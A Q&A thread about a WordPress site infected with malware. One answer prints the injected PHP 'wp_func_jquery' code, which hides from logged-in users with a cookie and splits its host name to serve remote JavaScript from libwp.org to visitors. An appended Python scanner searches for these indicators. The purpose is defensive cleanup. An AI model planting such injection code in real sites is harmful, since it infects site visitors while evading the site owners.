0

One of my company's clients' websites is infected with malware. In the source there is a <script src="http://www.10wp.org/jquery.js"></script> that is printed randomly.

I am following this article and searching the code. But so far I could find where the malicious script is inserted.

Did any of you have the same issue? Where did you find the malicious script?

André Luiz

2 Answers

0

You need to nuke the system from orbit. There is no way for us to know where that code is being injected into your server output, and there is no way for you to ever know that the system isn't still compromised.

You need to stand up a new server, patch it so that it is not reinfected, and load your application code from backup. That is the only way you can be sure you've resolved the problem.

AmericanUmlaut
  • I found where the script is inserted. It is wp_func_jquery in a masterslider plugin. But the thing that I don't understand yet. Did it infect the server? Isn't it just printing a malicious script so the visitors of the website get infected? – André Luiz Feb 17 '17 at 17:48
  • I don't know. That's why my advice is to replace the system and stand up a new one from backup. You can't be certain what the source of the change in your plugin was. – AmericanUmlaut Feb 17 '17 at 17:53
0

The malware inserts a piece of code in a random place of your site. After many hours of testing and searching I found this one.

    if(!function_exists('wp_func_jquery')) {
        if (!current_user_can( 'read' ) && !isset($_COOKIE['wp_min'])) {
            function wp_func_jquery() {
                $host = 'http://';
                $jquery = $host.'lib'.'wp.org/jquery-ui.js';
                $headers = @get_headers($jquery, 1);
                if ($headers[0] == 'HTTP/1.1 200 OK'){
                    echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
                }
            }
            add_action('wp_footer', 'wp_func_jquery');
        }
        function wp_func_min(){
            setcookie('wp_min', '1', time() + (86400 * 360), '/');
        }
        add_action('wp_login', 'wp_func_min');
    }

Look for wp_func_jquery or lib'.'wp.org

The inserted jquery should be empty when you open it in a browser; it deploys its payload under other circumstances.

Hope it helps

Max Lumnar
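
A small scanner for the search strings named in the answer above, as an added example that is not part of the original post: it collapses PHP string concatenation before matching, so the split host `'lib'.'wp.org'` is found as `libwp.org`, which a plain search for the domain would miss. The indicators come from this page; the function names, file suffixes and sample text are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Indicators from this page: the two function names in the injected code and
# the two hosts (the question's script tag, the answer's snippet).
INDICATORS = ("wp_func_jquery", "wp_func_min", "libwp.org", "10wp.org")
PHP_SUFFIXES = {".php", ".phtml", ".inc"}  # assumption: where PHP code lives

# A quote, a dot, a quote: the join in 'lib'.'wp.org'. Removing it also eats a
# literal '.' string, which only affects the normalized view used for matching.
JOIN = re.compile(r"""['"]\s*\.\s*['"]""")

def normalize(line):
    """Collapse PHP string concatenation so split literals read as one."""
    return JOIN.sub("", line).lower()

def scan_text(text):
    """Return (line number, indicator) pairs found in one file's text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        flat = normalize(line)
        hits.extend((lineno, ind) for ind in INDICATORS if ind in flat)
    return hits

def scan_tree(root):
    """Scan every PHP file under root; map path -> list of hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed sample built from lines of the snippet in the answer.
SAMPLE = """<?php
function wp_func_jquery() {
    $host = 'http://';
    $jquery = $host.'lib'.'wp.org/jquery-ui.js';
}
add_action('wp_footer', 'wp_func_jquery');
"""

if __name__ == "__main__":
    # With a directory argument, scan it; otherwise show the sample result.
    found = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_text(SAMPLE)}
    for path, hits in found.items():
        for lineno, ind in hits:
            print(f"{path}:{lineno}: {ind}")
```

A clean result only means these strings are absent from the scanned files; concatenation split across lines is not collapsed.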